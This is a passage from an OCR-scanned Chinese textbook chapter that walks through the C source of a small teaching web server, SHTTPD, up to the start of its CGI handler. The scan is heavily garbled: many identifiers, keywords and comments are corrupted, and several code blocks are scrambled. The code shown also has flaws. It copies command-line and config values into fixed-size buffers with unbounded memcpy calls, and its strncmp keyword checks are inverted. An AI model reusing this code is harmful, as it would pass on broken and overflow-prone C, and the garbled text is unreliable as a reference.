网 关 超时 。 | 一 一 =| 504 
HTTP 版 本 不 支持 | 一 一 ~| 505 


图 18.15 服务 器 SHTTPD 错误 代码 的 处 理 方 法 
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18.3 ”SHTTPD 各 模块 的 实现 


Web 服务 器 SHTTPD 中 实现 的 模块 有 命令 行 解析 、 文 件 配置 解析 、 多 客户 端 支持 、 
URI 解析 、 请 求 方法 的 解析 、 请 求 方法 的 响应 、CGI 的 支持 、HTTP 版 本 的 支持 、 内 容 类 
型 的 实现 、 错 误 的 处 理 方法 、 对 目录 列表 的 显示 ， 以 及 主 函 数 的 实现 ， 本 节 对 上 述 实现 方 
法 进行 介绍 。 


18.3.1 SHTTPD 命令 行 解析 的 实现 


SHTTPD 可 以 根据 用 户 的 命令 行 输入 进行 服务 器 的 配置 。 在 解析 用 户 输入 的 参数 后 ， 
对 默认 参数 进行 修改 来 启动 服务 器 。 

1. 配置 文件 的 结构 

服务 器 SHTTPD 的 结构 为 conf opts， 主 要 包含 CGI 根 路 径 、 网 络 资源 根 路 径 、 配 置 
文件 名 、 默 认 文件 名 、 服 务 器 侦 听 端口 、 最 大 客户 端 、 超 时 时 间 及 初始 化 线程 数量 。 原 型 
如 下 : 


struct conf opts{ 


char CGIRoot [128]; /*CGI 跟 路 径 */ 

char DefaultFile[128]; /* 默 认 文件 名 称 */ 

char DocumentRoot [128]; /* 根 文件 路 径 #/ 

char ConfigFile[128]; /* 配 置 文件 路 径 和 名 称 */ 
int ListenPort; /* 侦 听 端 口 */ 

int MaxClient; /* 最 大 客户 端 数 量 */ 
int TimeOut; /* 超 时 时 间 */ 

int InitClient; /* 初 始 化 线程 数量 */ 


}; 


2. 命令 行 解析 结构 


配置 文件 的 优先 级 为 配置 文集 > 命令 行 配 置 > 默认 配置 ， 在 初始 化 时 ， 服 务 器 的 默认 配 
置 为 CGI 根 路 径 为 “/usrlocal/varwww/cgi-bin/” 默认 文件 名 为 index.html， 根 文件 路 径 为 
“Jusr/local/Var/www/”， 配置 文件 名 为 “/etc/SHTTPD.conf”， 最 大 客户 端 数 量 为 4， 侦 听 端 
口 为 8080， 超 时 时 间 为 3 秒 ， 初 始 化 线程 数量 为 2， 代 码 如 下 : 


struct conf opts conf para={ 


/*CGIRoot*/ "/usr/local/var/www/cgi-bin/", 
/*DefaultFile*/ "index.html", 

/*DocumentRoot*/ "/usr/local/var/www/", 
/*ConfigFile*/ "/etc/SHTTPD.conf™", 
/*ListenPort*/ 8080, 

/*MaxClient*/ 4, 

/*TimeOut*#/ 3 

/*InitClient*/ 2 
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口 短 选项 的 配置 为 c:d:fiho:l:mit:: 


Static char ahortopts = Wordstshol mt 


口 长 选项 的 配置 如 下 : 


static struct option longopts[] = { 
{"CGIRoot", required argument, NULL, 'c'}, 
{"ConfigFile", required argument, NULL, ‘'f'}, 
{"DefaultFile", required argument, NULL, 'd'}, 
{"DocumentRoot", required argument, NULL, 'o'}, 
{"ListenPort", required argument, NULL, '1°'}, 
{"MaxClient", required argument, NULL, ‘'m'}, 
{ee required argument, NULL, 't'}, 
{"Help", no_argument, NULL: “hy 


{0, 0, 0, 0}, 


3， 命令 行 解析 代码 


命令 行 解析 函数 利用 getopt_long0) 函 数 ， 查 找 用 户 输 入 的 长 选项 和 短 选项 配置 ， 获 取 
其 配置 参数 。 对 于 成 功 匹 配 的 选项 ， 如 果 有 输入 参数 ， 则 输入 参数 为 optarg， 可 以 通过 这 
个 指针 对 输入 参数 进行 处 理 ， 进 一 步 获得 最 终 的 值 。 对 于 输入 参数 为 字符 串 的 ， 直 接 将 字 
符 串 复制 ， 对 于 输入 参数 为 整 型 的 ， 需 要 使 用 字符 串 到 整 型 的 转换 函数 ， 获 得 最 终 值 。 
static char *1] opt arg; 


static int Para CmdParse(int argc, char *argv[]) 


{ 


> 


int ce; 
int len; 
int value; 
/* 遍 历 输 入 参数 ,设置 配置 参数 */ 
while ((c = getopt long (argc, argv, shortopts, longopts, NULL)) != -1) 
{ 
switch (c) 
{ 
case 'c': /*CGI 根 路 径 */ 
1 opt arg = optarg; 
if(l opt arg && 1 opt arg[0]!=':'){ 
len = strlen(l] opt arg); 
memcpy (conf para.CGIRoot, 1 opt arg, len +1); 


/* 更 新 CGI 根 路 径 */ 
} 
break; 
case 'd': /* 默 认 文件 名 称 */ 
1 opt arg = optarg; 
if(l opt arg && 1 opt arg[0]!="':'){ 


len = strlen(l] opt arg); 
memcpy (conf_ para.DefaultFile, 1 opt arg, len +1); 


/* 更 新 默认 文件 名 称 */ 
} 
break; 
Caser Es /* 配 置 文件 名 称 和 路 径 */ 


1 opt arg = optarg; 


“Fe 
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zf(l1 opt arg && 1 opt arg[l0l!=":")t{ 
len = strlen(l opt arg); 
memcpy (conf para.ConfigFile, 1 opt arg, len +1); 


/* 更 新 配置 文件 名 称 和 路 径 */ 
} 
break; 
Saser Os /* 根 文件 路 径 */ 
1 _ opt arg = optarg; 
if(1 opt arg &é& 1 opt arg[0]!=":"){ 
len = strlen(l opt arg); 
memcpy (conf para.DocumentRoot, 1 opt arg, len +1); 
/* 更 新 根 文件 路 径 */ 
i 
break; 
case '1': /*# 侦 听 端 口 */ 


1 opt arg = optarg; 
if(l opt arg && 1 opt arg[0]!=":"){ 
len = strlen(l opt arg); 
value = strtol(1 opt arg，NULL，10);/* 转 化 字符 串 为 整 型 */ 
if(value != LONG MAX && value != LONG MIN) 
conf_para.ListenPort = value;  /* 更 新 侦 听 端口 */ 


break; 

case 'm': /* 最 大 客户 端 数 量 */ 
1 opt arg = optarg; 
if(l opt arg && 1 opt arg[0]!=":"'){ 


len = strlen(l opt arg); 
value = strtol (1 opt arg，NULL，10); /* 转 化 字符 串 为 整 型 */ 
if(value != LONG MAX && value != LONG MIN) 


conf para.MaxClient= value; /* 更 新 最 大 客户 端 数量 */ 


break; 
case 't': /* 超 时 时 间 */ 
1 opt arg = optarg; 
if(l1 opt arg && 1 opt arg[0]!=":'){ 
printf ("TIMEOUT\n"); 
len = strlen(l1 opt arg); 
value = strtol(1_opt_arg，NULL，10) ; /#+ 转 化 字符 串 为 整 型 */ 


if(value != LONG MAX && value != LONG MIN) 
conf para.TimeOut = value; /* 更 新 超时 时 间 */ 
} 
break; 
case '2': /* 错 误 参 数 */ 
printf ("Invalid para\n"); 
Case Mh /* 帮 助 */ 
display usage(); 
break; 


b 
} 


return 0; 
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18.3.2 SHTTPD 文件 配置 解析 的 实现 


服务 器 SHTTPD 配置 文件 的 优先 级 最 高 ， 对 其 进行 解析 后 的 值 覆 盖 其 他 配置 部 分 的 
值 。 单 行 配置 文件 的 格式 为 : 
[[ 室 格 ]# 注 释 1[ 空 格 ] 关键 字 [空格 ]= [空格 ] value] 


先 获得 配置 的 关键 字 和 值 部 分 ， 这 两 个 部 分 是 以 “=” 来 分 割 的 ， 然 后 根据 关键 字 对 
其 值 进 行 不 同 的 处 理 。 如 果 一 行为 “#” 开 始 ， 则 为 注释 行 。 


void Para FileParse(char *file) 
{ 
#define LINELENGTH 256 
char line{[LINELENGTH]; 
char *name = NULL, *value = NULL; 
int fd = —1s 
Lint n= O08 
fd = open(file，O RDONLY); 
if (fd == -1) 
{ 
goto ExITPara FileParse; 
上 


/* 

* 命 令 格 式 如 下 : 

*[# 注 释 | [空格 ] 关 键 字 [空格 ]=[ 空 格 ] value] 

A 

while( (n = conf readline(fd, line, LINELENGTH)) !=0) 


{ 
char *pos = line; 


while (isspace (*pos)){ /# 跳 过 一 行 开 头 部 分 的 空格 */ 
Pos++， 

if(*pos == '#'){ /* 注 释 ?*/ 
continue; 

$ 

name = pos; /* 关 键 字 开 始 部 分 */ 

while (!isspace (*pos) && *pos != '=') /* 关 键 字 的 末尾 *#/ 

{ 
post++; 

} 

*pos = '\0'; /* 生 成 关键 字 字符 串 */ 

while (isspace(*pos)) { /*value 部 分 前 面 空格 */ 
Pos++7 

value = pos; /*value 开始 */ 

while(!isspace(*pos) && *pos != '\r' && *pos != '\n'){/* 到 结束 */ 
Ppost++; 

+ 

*pos = '\0'; /* 生 成 值 的 字符 串 */ 


a 
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/* 根 据 关键 字 部 分 , 获得 value 部 分 的 值 */ 
int ivalue; 
/*"CGIRoot", "DefaultFile","DocumentRoot", "ListenPort", 
"MaxClient", "TimeOut"*/ 
if(strncmp ("CGIRoot", name, 7)) 1 /*CGIRoot 部 分 */ 
memcpy (conf Para.CGIRoot，value，strlen (value)+1) 7 
}else if(strncmp("DefaultFile", name, 11)){ 
/*DefaultFile 部 分 */ 
memcpy (conf para.DefaultFile, value, strlen(value)+1); 
}else if(strncmp ("DocumentRoot", name, 12)){ 
/*DocumentRoot 部 分 */ 
memcpy (conf para.DocumentRoot，value，strlen (value)+1) 7 
}else if(strncmp ("ListenPort"，name，10) ) { 
/+#TListenPort 部 分 */ 
ivalue = strtol (value, NULL, 10); 
conf para.ListenPort = ivalue; 
}else if(strncmp ("MaxClient", name, 9)){ /*MaxClient 部 分 */ 
ivalue = strtol (value, NULL, 10); 
conf para.MaxClient = ivalue; 
}else if(strncmp ("TimeOut", name, 7)){ /*TimeOut 部 分 */ 
ivalue = strtol (value, NULL, 10); 
conf para.TimeOut = ivalue; 
Y 
} 
close (fd); 
ExXITPara FileParse: 
return; 


} 


18.3.3 ”SHTTPD 的 多 客户 端 支持 的 实现 


服务 器 SHTTPD 的 多 客户 端 支 持 框 架 的 函数 主要 为 函数 Worker_ScheduleRun() 和 函数 
Worker_ScheduleStop()， 这 两 个 函数 通过 对 结构 struct worker_opts 进行 管理 来 控制 线程 的 
状态 。 结 构 struct worker_opts 的 原型 如 下 : 


struct worker opts{ 


pthread t th; /* 线 程 的 ID 号 */ 

int flags; /* 线 程 状态 */ 
pthread mutex t mutex; /#* 线 程 任务 互 斥 */ 
struct worker ctl *work; /* 本 线程 的 总 控 结 构 */ 


结构 中 的 成 员 变 量 flags 用 于 表示 线程 所 处 的 状态 , 成 员 mutex 用 于 控制 对 本 线程 互 斥 
区 成 员 的 访问 ，th 为 线程 建立 时 的 线程 ID 号 。 

Worker ScheduleRun() 函 数 初始 化 多 个 处 理 客户 端 请 求 的 业务 线程 ,并 侦 听 客户 端的 连 
接 请 求 ， 当 有 连接 到 来 的 时 候 ， 查 询 业 务 处 理 线程 ， 将 此 客户 端 分 配给 业务 处 理 线程 。 

(1) 首先 初始 化 业务 处 理 线程 。 

/* 主 调度 过 程 ， 

* ” 当 有 客户 端 连 接 到 来 的 时 候 

* ”将 客户 端 连接 分 配给 空 闻 客户 端 


* ”由 客户 端 处 理 到 来 的 请 求 
#/ 


“i 


第 18 章 一 个 简单 Web 服务 器 的 例子 SHTTPD 


int Worker ScheduleRun (int ss) 


{ 


DBGPRINT ("==>Worker ScheduleRun\n"); 
struct sockaddr in client; 

socklen t len = sizeof (client); 

/* 初 始 化 业务 线程 */ 


Worker Init(); 


int i = 0; 


(2) 当 调 度 状态 SCHEDULESTATUS 为 STATUS_RUNNING 的 时 候 ， 函 数 select() 等 


待 客户 端的 连接 。 当 有 客户 端 连接 到 来 的 时 候 ， 查 找 空 闻 的 业务 线程 ， 如 果 没 有 则 增加 一 


个 业务 线程 ， 然 后 将 此 任务 分 配给 找到 的 空闲 业务 线程 。 
for(;SCHEDULESTATUS== STATUS RUNNING;) 
{ 
struct timeval tv; /* 超 时 时 间 */ 
fd set rfds; /* 读 文件 集 */ 
int retval = -1; 


/* 清 空 读 文 件 集 , 将 客户 端 连 接 描述 符 放 入 读 文件 集 */ 

FD ZERO(&rfds) 

FD SET(ss, &rfds); 

tv.tv_sec = 0; /* 设 置 超时 */ 
tv.tv_ usec = 500000; 


retval = select(ss + 1, &rfds, NULL, NULL, &tv); /* 超 时 读数 据 */ 
Switch (retval) 


下 


case -1: /* 错 误 */ 
case 0: /* 超 时 */ 
continue; 
break; 
default: 
if(FD ISSET(ss, &rfds)) /* 检 测 文件 */ 


{ 
int sc = accept(ss， (struct sockaddr*) &client, &len); 
i = WORKER_ISSTATUS (WORKER_IDEL) ; ”/* 查 找 空闲 业务 线程 */ 
ifl(i == =1) /* 没 有 找到 */ 
{ 
/* 是 否 到 达 最 大 客户 端 数 */ 
i = WORKER ISSTATUS (WORKER DETACHED); 
if(i != -1) /* 没 有 ,增加 一 个 业务 处 理 线程 */ 
Worker Add( i); 
} 
if(i != -1) /* 业 务 处 理 线程 空闲 , 分配 任 务 */ 
{ 
wctls[i].conn.cs = sc; /* 套 接 字 描述 符 #/ 
pthread mutex unlock(&wctls[i] .opts.mutex); 


/* 告 诉 业务 线程 有 任务 */ 


} 


DBGPRINT ("<==Worker ScheduleRun\n"); 
return 0; 
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} 


(3) Worker_ ScheduleStop() 函 数 用 于 终止 业务 处 理 线程 和 分 配 任务 线程 。 它 先 将 控制 
分 配 任务 流程 的 变量 SCHEDULESTATUS 设置 为 STATSU_STOP， 保 证 分 配 业 务 线程 不 再 
分 配 任务 ;然后 给 所 有 的 业务 处 理 线程 发 送 终 止 命令 ， 等 待 所 有 的 业务 线程 退出 ， 当 所 有 
的 业务 线程 销毁 之 后 ， 释 放 资 源 并 退出 。 

/* 停 止 调度 过 程 */ 

int Worker_ScheduleStop () 


| 
DBGPRINT ("==>Worker ScheduleStop\n"); 


SCHEDULESTATUS = STATSU STOP; /* 给 任务 分 配 线程 设置 终止 条 件 */ 
int i =0; 

Worker Destory(); /* 销 毁 业 务 线程 */ 

int allfired = 0; 

for(;!allfired;) /* 查 询 并 等 待业 务 线程 终止 */ 


allfired = 1; 
for(i = 0; i<conf para.MaxClient;i++) 
{ 
int flags = wctls[i].opts.flags; 
if(flags == WORKER DETACHING || flags == WORKER_IDEL) 
/* 线 程 正 活动 */ 
allfired = 0; 


1 


pthread mutex destroy(&thread init); /* 销 毁 互 斥 变 量 */ 
for(i = 0; i<conf para.MaxClient;i++)  /* 销 毁 业务 处 理 线程 的 互 斥 */ 
pthread mutex destroy(&wctls[i] .opts.mutex); 


free (wctls); /* 销 毁 业 务 数据 */ 


DBGPRINT ("<==Worker_ ScheduleStop\n"); 
return 0; 
} 
业务 处 理 线程 的 维护 有 业务 处 理 线程 初始 化 、 业 务 处 理 线程 销毁 、 业 务 处 理 线程 增加 
和 业务 处 理 线程 删除 等 。 负 责 初始 化 、 增 加 、 删 除 和 销毁 功能 ， 并 且 有 查询 业务 处 理 线程 
状态 的 函数 ， 方 便 控 制 业务 线程 。 
(4) 初始 化 业务 线程 的 函数 为 Worker_Init()， 负 责 申请 维护 全 部 业务 和 线程 状态 的 结 
构 struct worker_ctl， 个 数 为 配置 文件 中 设置 的 最 大 客户 端 数 ， 每 一 个 均 表 示 一 个 线程 : 
初始 化 线程 */ 
static void Worker Init() 
{ 


DBGPRINT ("==>Worker Init\n"); 
nt 0 


wctls = (struct worker ctl*)malloc (sizeof (struct worker ctl)*conf para. 
MaxClient); /* 初 始 化 总 控 参 数 */ 
memset (wctls, 0, sizeof (*wctls)*conf para.MaxClient);/* 清 零 */ 
结构 定义 如 下 ， 其 中 的 成 员 opts 用 于 表示 线程 的 状态 ， 成 员 conn 表示 客户 端 请 求 的 
状态 和 值 : 


和 
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struct worker ctl{ 
struct worker opts opts; 
struct worker conn conn; 


pa 


其 中 的 结构 struct worker_conn 用 于 维护 客户 端 请 求 和 响应 数据 , 结构 如 下 所 示 。 其 中 ， 
dreq 存放 接收 到 的 客户 端 请 求 数据 ，dres 存放 发 送 给 客户 端的 数据 ，cs 为 与 客户 端 连接 的 
套 接 字 描 述 符 ，to 表示 超时 响应 时 间 ，con_res 维护 响应 结构 ，con_req 维护 客户 端的 请 求 。 


struct worker conn 


{ 


#define K 1024 


char dreq[16*#K]; /* 请 求 缓冲 区 */ 

char dres[16*K]; /* 响 应 缓冲 区 */ 

int cs; /* 客 户 端 套 接 字 文件 描述 符 */ 

int 1p /* 客 户 端 无 响应 时 间 超时 退出 时 间 */ 
struct conn response con res; /* 响 应 结构 */ 

struct conn request con req; /* 请 求 结构 */ 

struct worker ctl *work; /* 本 线程 的 总 控 结 构 */ 


}; 


(5) 然后 开始 初始 化 结构 struct worker_ctl 的 值 ， 如 设置 线程 的 默认 状态 为 WORKER_ 
DETACHED ， 表 示 可 以 建立 线程 挂 接 到 此 结构 上 ， 初 始 化 互 斥 量 并 调用 函数 
pthread_mutex_lock 锁定 互 斥 区 。 还 完成 各 部 分 的 回 指针 ,方便 之 后 的 调用 ,主要 有 控制 结 
构 opts 中 指向 总 控 结构 的 指针 , 请 求 结构 中 指向 连接 的 指针 , 响应 结构 中 指向 连接 的 指针 。 

/* 初 始 化 一 些 参数 */ 


for(i = 0; i<conf para.MaxClient;i++) 


{ 


/*opts&conn 结构 与 worker_ctl 结构 形成 回 指针 */ 


wctls[i 
wctls[i 


.Opts.work = &wctls([il]; 
.Conn.work = &wctls[il]; 


/*opts 结构 部 分 的 初始 化 */ 


wctls[i 
//wctls 
pthread 
pthread 


.opts.flags = WORKER DETACHED; 

i] .opts .mutex = PTHREAD MUTEX_ INITIALIZER; 
mutex init(&wctls[i] .opts.mutex,NULL); 
mutex lock(&wctls[i] .opts.mutex); 


/*conn 部 分 的 初始 化 */ 
/*con_req&con_res 与 conn 结构 形成 回 指 */ 


wctls[i 
wctls[i 


.Conn.con req.conn = &wctls[i].conn; 
.Conn.con res.conn = &wctls[i].conn; 


wctls[i].conn.cs = -1; /* 客 户 端 socket 连接 为 空 */ 
/*con_req 部 分 初始 化 */ 


wctls[i 
wctls[i 
wctls[i 


.Conn.con req.req.ptr = wctls[i].conn.dreq; 
.conn.con req.head = wctls[i].conn.dreq; 
.Conn.con req.uri = wctls[i].conn.dreq; 


/*con res 部 分 初始 化 */ 


wctls[i 
wctls[i 


} 


Conn.con res.fd = -1; 
.Conn.con res.res.ptr = wctls[i] .conn.dres; 


在 初始 化 参数 完毕 后 ， 建 立 多 个 业务 线程 ， 其 个 数 由 配置 时 指定 ， 即 初始 化 客户 端 
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for(i = 0; i<conf para.InitClient;i++) 
{ 

/* 增 加 规定 个 数 工作 线程 */ 

Worker Add(i); 


} 
DBGPRINT ("<==Worker Init\n"); 


18.3.4 SHTTPD 所 请 求 URI 解析 的 实现 


服务 器 SHTTPD 中 URI 解析 主要 包含 “有 害 ” 字 符 的 替换 ， 即 将 以 “%” 开 始 的 字符 
进行 转换 ， 如 将 “%20” 转 换 为 “空格 ”。 进行 字符 转换 的 函数 为 uri_decode()， 代 码 如 下 : 


static int uri decode(char *src, int src len, char *dst, int dst len) 
nb dr i Gr be 
#define HEXTOI (x) (isdigit(x) ? x - '0' : x - 'W') 
for (i=j= 0; i< src len && jj < dst len = 1; i++ j++) 
{ 
Switch (src[i]) 
{ 
Case '%': 
if (isxdigit(((unsigned char *) src)[i + 1]) && 
isxdigit(((unsigned char *) src)[i + 2])) 
{ 
a = tolower(((unsigned char *)src) [i + 1]); 
b = tolower(((unsigned char *)src) [i + 2]); 
dst[j] = (HEXTOI(a) << 4) | HEXTOI (b); 


和 
L 
else 
. 
dst[j] = '%'» 
break; 
default: 
dst[j] = src[i]; 
break; 
} 
UL 
dst[j] = '\0'; /* Null-terminate the destination */ 


return (j); 
} 


对 于 目录 中 的 双 点 “..”， 需 要 进行 转换 ， 即 进入 当前 目录 的 父 目录 。 代 码 如 下 : 


static void 
remove_ double dots(char *s) 
{ 

char *p = S7 

while (*s != '\0') 

{ 


*#P+ 二 二 #S 二 十 7 


二 打算 下 ] 二 二 汪 丰 2 计 本 让 和 和 NA 
{ 
while (*s == '." || *s == '/' || *s == "'\\') 
{ 
St+; 
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18.3.5 ”SHTTPD 方法 解析 的 实现 

服务 器 SHTTPD 请 求 方法 的 解析 比较 简单 ， 使 用 比较 字符 串 的 方法 。 建 立 一 个 表示 请 
求 方法 的 结构 数组 ， 逐 个 比较 客户 端 请 求 方法 的 字符 串 和 数组 中 成 员 请 求 方法 的 异同 。 请 
求 方法 的 结构 如 下 ，ptr 表示 请 求 方法 的 名 称 ，len 表示 请 求 方法 的 长 度 ，type 表示 请 求 方 
法 的 类 型 。 


typedef struct vec 


{ 
char *ptrs; /#* 字 符 串 */ 
int len; /* 字 符 串 长 度 */ 
SHTTPD METHOD TYPE type; /* 字 符 串 表示 类 型 */ 
}vec; 


建立 一 个 结构 数组 _shttpd_methods， 将 各 种 结构 放 入 : 


struct vec _shttpd methods[] = { 


{"GET", 3, METHOD GET}, /*GET 方法 +/ 
{POSTn 4, METHOD POST}, /*POST 方法 */ 
PUT 3, METHOD PUT}, /*PUT 方法 +/ 
{"DELETE", 6, METHOD DELETE)}, /*DELETE 方法 */ 
{"HEAD", 4, METHOD HEAD}, /*HEAD 方法 */ 
{NULL, 0} /* 结 尾 */ 


}; 

将 客户 端的 请 求 方法 与 请 求 方法 的 结构 数组 进行 比较 ， 返 回 找到 的 匹配 项 。 
struct vec *m= NULL; 

/* 查 找 比较 方法 字符 串 */ 


for (m = & shttpd methods [0] ;m->ptr!=NULL;m++) 
{ 


if(!strncmp (m->ptr, pos, m->len)) /*# 比 较 字 符 串 */ 

{ 
req->method = m->type; /#+ 更 新 头 部 方法 */ 
found = 1; 
break; 

} 


18.3.6 ”SHTTPD 响应 方法 的 实现 

服务 器 SHTTPD 可 以 识别 的 方法 为 GET、PUT、POST、DELETE 和 HEAD 等 ， 但 仅 
实现 了 GET 方法 。 在 请 求 方法 分 析 中 已 经 可 以 获得 客户 端 请 求 的 方法 ， 在 响应 中 ， 只 要 匹 
配 其 方法 就 可 以 了 。 

(1) 方法 的 总 函数 为 Method_Do()， 实 现 如 下 : 
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void Method Do (struct worker ctl *wctl1) 


. 


} 


(2) 请 求 结构 的 原型 如 下 所 示 。 主要 用 于 解析 客户 端的 请 求 , 包括 


生成 的 真实 地 址 、 请 求 的 类 型 、HTTP 的 主 版 本 和 副 版 本 、 头 部 结构 等 参数 。 代 码 如 下 : 


DBGPRINT ("== 


if(0) 


>Method Do\n"); 


Method DoCGI (wctl1); 
Switch (wctl->conn.con req.method) 


{ 


case METHOD PUT: 
Method DoPut (wct1); 


break; 


case METHOD DELETE: 
Method DoDelete (wctl1); 


break; 


case METHOD GET: 
Method DoGet (wctl1); 


break; 


case METHOD POST: 


Method DoPost (wct1); 


break; 


case METHOD HEAD: 


Method DoHead (wctl1); 


break; 


default: 


Method DoList (wct1); 


| 
DBGPRINT ("<==Method Do\n"); 


struct conn request{ 
struct vec req; 
char *head; 


i 


char *uri; 
char rpath[URI MAX]; 
int method; 
/*HTTP 的 版 本 信息 */ 
unsigned long major; 
unsigned long minor; 
struct headers ch; 

struct worker conn *conn; 
int err; 


(3) 其 中 的 头 部 结构 表示 不 含 第 一 行 的 其 他 客户 端 
例如 内 容 长 度 、 内 容 类 型 、 连 接 状 态 、 最 后 修改 时 间 、 用 户 名 称 、 用 户 代理 、 


位 置 、 请 求 的 内 容 范 围 


的 字符 串 和 长 度 。 


struct headers { 
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union 
union 
union 
union 


Variant 
Variant 
Variant 
Variant 


人/* 请 求 结构 */ 

/* 请 求 向 量 #*/ 

人/* 请 求 头 部 '0' 结 尾 */ 
/* 请 求 URI, '0' 结尾 */ 


:部 指针 、uri 指针 、 


/* 请 求 文件 的 真实 地 址 '01' 结尾 */ 


/* 请 求 类 型 */ 


/* 主 版 本 */ 
/* 副 版 本 */ 

/* 头 部 结构 */ 

/* 连 接 结构 指 针 */ 
/* 错 误 代码 */ 


请 求 信息 。 包 含 常用 的 头 部 信息 ， 


参考 、Cookie、 


状态 值 、 编 码 类 型 等 ， 其 中 每 个 成 员 均 为 向 量 型 变量 ， 包 含 表达 


原型 如 下 : 


cl; 
ct; 
connection; 


ims; 


/* 内 容 长 度 */ 
/* 内 容 类 型 */ 
/* 连 接 状 态 */ 
/* 最 后 修改 时 间 */ 
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union variant user; /* 用 户 名 称 */ 
union variant auth; /* 权 限 */ 
union variant useragent; /* 用 户 代理 */ 
union variant referer; /* 参 考 */ 
union variant cookie; /* 位 置 */ 
union variant range; /* 范 围 */ 
union variant status; /* 状 态 值 */ 
union variant transenc; /* 编 码 类 型 */ 


] 


(4) 响应 结构 ， 主 要 包含 由 服务 器 发 往 客户 端 时 用 到 的 部 分 参数 ， 例 如 建立 时 间 、 超 


时 时 间 、 响 应 的 状态 值 、 响 应 的 内 容 长 度 、 请 求 文件 描述 符 、 请 求 文件 的 状态 等 。 原 型 
如 下 : 
struct conn response{ /* 响 应 结构 */ 

struct vec res; /* 响 应 向 量 */ 
time t birth time; /* 建 立时 间 */ 
time t expire time; /* 超 时 时 间 */ 
int status; /* 响 应 状态 值 */ 
int CL /* 响 应 内 容 长 度 */ 
int fd; /* 请 求 文件 描述 符 */ 
struct stat fsate; /* 请 求 文件 状态 */ 
struct worker conn *conn; /* 连 接 结构 指针 */ 


We 


其 中 Method_DoGet() 函 数 整 理 得 到 响应 的 头 部 , 并 将 客户 端 申 请 资源 的 内 容 长 度 放 到 
成 员 变 量 cl 中 ,便于 之 后 的 使 用 。Method_DoGet() 函 数 的 头 部 数据 信息 为 如 下 形式 的 字 


符 串 ， 
[RTPP/IS LT 200 OK 
Date: Thu, 11 Dec 2008 11:25:33 GMT 
Last-Modified: Wed, 12 Nov 2008 09:00:01 GMT 
Etag: "491a2a91.2afe" 
Content-Type: text/plain 
Content-Length: 11006 
Accept-Ranges: bytes] 


/* 第 一 行 */ 
/* 时 间 */ 

/* 修 改 时 间 */ 
/*Web 资源 标记 号 */ 
/* 文 件 类 型 */ 

/* 内 容 长 度 */ 

/* 接 收 范围 */ 


(5) Method_DoGet() 函 数 先 初始 化 一 些 参数 ， 例 如 状态 值 、 状 态 信息 等 。 


static int Method DoGet (struct worker ctl *wctl) 


{ 
DBGPRINT ("==>Method DoGet\n"); 


struct conn response *res = &wctl->conn.con res; 
struct conn request *req = &wctl->conn.con req; 


char path[URI MAX]; 
memset (path, 0, URI MAX); 
Size 七 ns 
unsigned long 
char *fmt = "%a, 
/* 需 要 确定 的 参数 */ 


size 七 status = 200; 


bo Be 


Char *msg = "OK"; 


%d %b %Y %H:%M:%S GMT"; 


/* 状 态 值 , 已 确定 */ 
/* 状 态 信息 , 已 确定 */ 
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char date[64] = ""; /* 时 间 */ 

char lm[64] = ""; /* 请 求 文件 最 后 修改 信息 */ 
char etag[64] = ""; /*etag 信息 */ 
RawDEIECI /* 内 容 长 度 #/ 

char range[64] = ""; /* 范 围 */ 


struct mine type *mine = NULL; 


(6) 之 后 获得 构建 头 部 需要 的 数据 ， 例 如 当前 时 间 、 最 后 修改 时 间 、ETAG、 内 容 类 
型 、 内 容 长 度 及 范围 等 数据 。 


/* 当 前 时 间 */ 
time 七 七 = time (NULL); 
(void) strftime(date, 
sizeof (date), 
fmt, 
localtime (&t)); 
/* 最 后 修改 时 间 */ 
(void) strftime (lm, 
sizeof (lm)， 
Fmts 
localtime (&res->fsate.st mtime)); 


/*ETAG*/ 
(void) snprintf (etag, 
sizeof (etag), 
i 
(unsigned long) res->fsate.st mtime, 
(unsigned long) res->fsate.st size); 


/* 发 送 的 MIME 类 型 */ 

mine = Mine _ Type (req->uri, strlen(req->uri), wctl1); 
/* 内 容 长 度 */ 

cl = (big int t) res->fsate.st size; 

/* 范 围 range*/ 

memset (range, 0, sizeof (range)); 


n= -1; 
if (req->ch.range.v vec.len > 0 ) /* 取 出 请 求 范围 */ 
L 


printf("request range:%d\n",req->ch.range.v vec.len); 
n = sscanf(req->ch.range.v_vec.ptr,"bytes=%lu-%lu", &rl, &r2); 


上 
EntEKwa gGNR ny 
二 En > 0) 


status = 206; 
(void) fseek(res->fd, rl1l, SEEK SET); 
ee 
(void) snprintf (range, 
sizeof (range), 
"Content-Range: bytes %lu-%lu/%lu\r\n", 
学 
RE 
(unsigned long) res->fsate.st size); 
msg = "Partial Content"; 


} 
(7) 最 后 根据 各 种 数据 ， 构 建 输出 的 头 部 数据 。 
/* 构 建 输出 的 头 部 */ 
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memset (res->res.ptr, 0, sizeof (wctl->conn.dres)); 
snprintf( 


res->res.ptr, /* 缓 冲 区 */ 

sizeof (wctl->conn.dres), /# 缓 冲 区 长 度 */ 
"HTTP/1.1 %d Ss\r\n" /* 状 态 和 状态 信息 */ 
"Date: %sNrNnn /* 日 期 */ 
"Last-Modified: %s\r\n" /* 最 后 修改 时 间 */ 
"Etag: \"Ss\"\r\n" /*Web 资源 标记 号 */ 
"Content-Type: %.*s\r\n" /* 内 容 类 型 */ 
"Content-Length: glu\r\n" /* 内 容 长 度 */ 
"Accept-Ranges: bytes\r\n" /* 发 送 范围 */ 
nNENnAn, /* 范 围 起 始 */ 
status, /* 状 态 值 */ 

msg, /* 状 态 信息 */ 
date, /* 日 期 */ 

1m, /* 最 后 修改 时 间 */ 
etag, /*WeDb 资源 标记 号 */ 
strlen (mine->mime type) ， /* 内 容 类 型 长 度 */ 
mine->mime type, /* 内 容 类 型 */ 

cy /* 内 容 长 度 #*/ 
range); /* 范 围 */ 


res->cl = cl; 

res->status = status; 

DBGPRINT ("<==Method DoGet\n"); 
return 0; 


18.3.7 SHTTPD 支持 CGI 的 实现 

CGI 支持 的 实现 主要 包含 CGI 命令 获取 、CGI 参数 获取 、 管 道 进程 间 连接 、 主 进程 
CGI 进程 读 取 数据 和 发 送 数 据 、CGI 进程 执行 并 发 送 结果 给 主 进程 。 

(1) 实现 CGI 的 过 程 ， 先 初始 化 变量 ， 这 是 比较 通用 的 方法 。 
/*CGI 目录 的 字符 串 */ 


#define CGISTR "/cgi-bin/" 


#define ARGNUM 16 /*CGI 程序 变量 的 最 大 个 数 */ 
#define READIN 0 /* 读 出 管道 */ 
#define WRITEOUT 1 /* 写 入 管道 #/ 


int cgiHandler (struct worker ctl] *wctl) 
{ 
struct conn request *req = &wctl->conn.con req; 
struct conn response *#res = &wctl->conn.con res; 
char *command = strstr(req->uri, CGISTR) + strlen (CGISTR); 
